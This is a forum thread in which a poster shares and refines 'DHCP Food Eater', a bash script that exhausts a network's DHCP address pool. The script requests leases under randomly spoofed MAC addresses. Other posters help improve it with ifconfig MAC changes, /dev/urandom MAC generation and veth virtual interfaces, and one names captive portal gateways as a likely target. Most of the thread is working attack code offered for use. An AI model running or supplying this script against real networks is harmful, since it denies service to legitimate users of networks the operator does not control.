Sign in to follow this  
Followers 0
TheFunk

DHCP Starvation Script

11 posts in this topic

I wrote a simple DHCP starvation script the other day. It's a bash script per my usual. It requires you to have dhcpcd and macchanger installed. However, A problem occurs when I bring the target interface down. Instead of holding the lease for however long, I'm finding that most DHCP servers will instantly readd the IP address that my computer acquired back to the pool and then reissue it when I make a request from a new (spoofed) MAC address. Anyone have any ideas for how I can resolve this issue? Perhaps there's a means of creating subinterfaces in Linux, that way I don't have to break connection? Anyway, here you are, enjoy! If anyone is interested in the script, I plan on changing it so that it takes parameters, for example ./foodeater --nmask 24, or something along those lines in the near future.

#!/bin/bash## DHCP Food Eater# by TheFunk## Kills Backtrack's Default DHCP Daemonkill `ps ax | egrep "dhclient" | head -1 | cut -d' ' -f2`clearecho ""echo "How many addresses should we try to exhaust?"read rangeclearecho ""echo "What interface are we using?"read daintfor ((current=1; current<range; current++));dokill `ps ax | egrep "dhcpcd" | head -1 | cut -d' ' -f2`ifconfig $daint downmacchanger -A $daintsleep 2ifconfig $daint updhcpcd $daintsleep 5echo "I have" $current "addresses"done

 

1

Share this post


Link to post
Share on other sites

Revised Version. Now with more ease of use.

 

#!/bin/bash## DHCP Food Eater# by TheFunk## Usage: ./foodeater number-of-requests-to-make interface-to-use# Usage Example: ./foodeater 255 wlan0# In the above example the script will request 255 unique IP addresses from the DHCP server.# If the network is a typical Class C with a /24 network mask, then 254 should be the# maximum number of IP addresses available, and the 255th request should throw an error.# In the example case, the network is wireless, as indicated by the name wlan0.# Kills Backtrack's Default DHCP Daemonkill `ps ax | egrep "dhclient" | head -1 | cut -d' ' -f2`clearrange=$1daint=$2cat <<"EOF"Ready?            (\____/)            / @__@ \               (  (oo)  )               `-.~~.-'             /    \                        @/      \_                    (/ /    \ \)      jgs  WW`----'WW	Press EnterEOFread holdfor ((current=1; current<range; current++));dokill `ps ax | egrep "dhcpcd" | head -1 | cut -d' ' -f2`ifconfig $daint downmacchanger -A $daintsleep 2ifconfig $daint updhcpcd $daintsleep 3echo "I have" $current "addresses"done
1

Share this post


Link to post
Share on other sites

Heh, nice work! DHCP is often overlooked as a source of trouble from outsiders on networks. One situation that comes to mind is captive portal Internet gateways.

0

Share this post


Link to post
Share on other sites

Thanks! Also, I read your post on NELF. If I lived anywhere farther North I would have definitely been there. A festival dedicated to Linux? Yes please.

0

Share this post


Link to post
Share on other sites

hello (just registered)

 

 

you can also just use ifconfig, like this

 

ifconfig eth0 down
ifconfig eth0 hw ether 00:11:22:33:44:55
ifconfig eth0 up

 

no need to install additional software

1

Share this post


Link to post
Share on other sites

That's true, and glad to have been your first post :)

The thing that really appealed to me about using macchanger though was the pseudo-random generator. It would be a pain in the butt to generate a random mac address with bash. I could have also just stuck with dhclient instead of using dhcpcd, but that's a matter of personal preference.

Lastly, I realize an error in the script, the for statement at the end should read "for ((current=1; current<=range; current++));" instead of "for ((current=1; current<range; current++));"

0

Share this post


Link to post
Share on other sites

For generating a random(ish) MAC address, can you sample /dev/(u)random and convert what you get to hex?

0

Share this post


Link to post
Share on other sites

And if you don't want to bring the if down you can use virtual interfaces

 

ip link add type veth (will generate a random mac and increment the name. veth0, veth1...)

ifconfig veth0 up

ifconfig veth0 inet dhcp

 

maybe like this you can get multiple interfaces leased at the same time

1

Share this post


Link to post
Share on other sites

That's perfect! That's exactly what I was trying to figure out how to do! Virtual/Sub interfaces. Come to think of it, I probably should have just Googled that. Thanks!

And I'll see about /dev/urandom. The key will be only pulling hex characters, but that shouldn't be too hard. Fellas you've given me a lot to work with.

0

Share this post


Link to post
Share on other sites

Getting a MAC address from /dev/urandom:

 

dd if=/dev/urandom bs=6 count=1 | hexdump -e '1/1 "%.2x:"' | sed 's/:$/\n/'

 

Remember, every byte can be expressed as hex :D

 

EDIT: Removed `status=none`, apparently it doesn't work on BSD `dd`

 

EDIT AGAIN: Derp, 6 bytes, 12 hex /digits/

1

Share this post


Link to post
Share on other sites

Arlrighty, I'm definitely getting closer. The only problem left now is finding a way to give each subinterface it's own unique spoofed MAC instead of just the parent interface. For some reason the aliased interfaces refuse to take individual MAC addresses. I tried the veth method, but that allowed for a maximum of 2 "virtual interfaces" when I tried, so this was the next best thing I could think of. I'm going to look into ip addr and see if that might help some. Now...back to the Batcave!
 

#!/bin/bash## DHCP Food Eater# by TheFunk## Usage: ./foodeater number-of-requests-to-make interface-to-use# Usage Example: ./foodeater 255 wlan0# In the above example the script will request 255 unique IP addresses from the DHCP server.# If the network is a typical Class C with a /24 network mask, then 254 should be the# maximum number of IP addresses available, and the 255th request should throw an error.# In the example case, the network is wireless, as indicated by the name wlan0.# Kills Backtrack's Default DHCP Daemonkill `ps ax | egrep "dhclient" | head -1 | cut -d' ' -f2`clearrange=$1daint=$2cat <<"EOF"Ready?            (\____/)            / @__@ \               (  (oo)  )               `-.~~.-'             /    \                        @/      \_                    (/ /    \ \)      jgs  WW`----'WW	Press EnterEOFread hold# Spoofs MAC address.ifconfig $daint downmacaddr=`dd if=/dev/urandom bs=6 count=1 | hexdump -e '1/1 "%.2x:"' | sed 's/:$/\n/'`ifconfig $daint hw ether $macaddr# Loops until all addresses are exhausted...and then some.for ((current=1; current<=range; current++));doifconfig $daint":"$currentdhcpcd $daintecho "I have" $current "addresses"done
1

Share this post


Link to post
Share on other sites

Create an account or sign in to comment

You need to be a member in order to leave a comment

Create an account

Sign up for a new account in our community. It's easy!


Register a new account

Sign in

Already have an account? Sign in here.


Sign In Now
Sign in to follow this  
Followers 0